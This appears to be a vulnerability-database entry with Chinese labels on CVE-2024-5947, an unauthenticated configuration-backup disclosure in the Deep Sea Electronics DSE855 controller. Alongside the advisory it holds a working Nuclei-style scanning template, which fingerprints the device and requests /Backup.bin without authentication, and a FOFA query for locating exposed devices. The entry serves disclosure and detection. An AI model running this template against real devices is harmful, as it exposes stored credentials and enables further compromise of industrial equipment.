CVE-2024-5947: Deep Sea Electronics DSE855 - Authentication Bypass

日期: 2025-08-01 | 影响软件: Deep Sea Electronics DSE855 | POC: 已公开

漏洞描述

Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Deep Sea Electronics DSE855 devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web-based UI. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-22679.

PoC代码[已公开]

id: CVE-2024-5947

info:
  name: Deep Sea Electronics DSE855 - Authentication Bypass
  author: s4e-io
  severity: medium
  description: |
    Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Deep Sea Electronics DSE855 devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web-based UI. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-22679.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-5947
    - https://packetstormsecurity.com/files/179342/Deep-Sea-Electronics-DSE855-Remote-Authentication-Bypass.html
    - https://www.zerodayinitiative.com/advisories/ZDI-24-671/
  classification:
    epss-score: 0.83306
    epss-percentile: 0.99228
  metadata:
    verified: "true"
    max-request: 1
    vendor: Deep Sea Electronics
    product: DSE855
    fofa-query: "Deep Sea Electronics"
  tags: packetstorm,cve,cve2024,bypass,info-leak

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"Copyright Deep Sea Electronics")'
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        GET /Backup.bin HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type,"Unknown")'
          - "status_code == 200"
        condition: and
# digest: 4a0a0047304502202c90a5c009ec759edeeb6c157d38d2a8de39f78ed60bd0e7cb5e248d2c9ea9af022100ad926deef2971a4214fd47c15a6cc922f7067f4ce5c1b1f2eba5e8b4c42c59ba:922c64590222798bb761d5b6d8e72950

相关漏洞推荐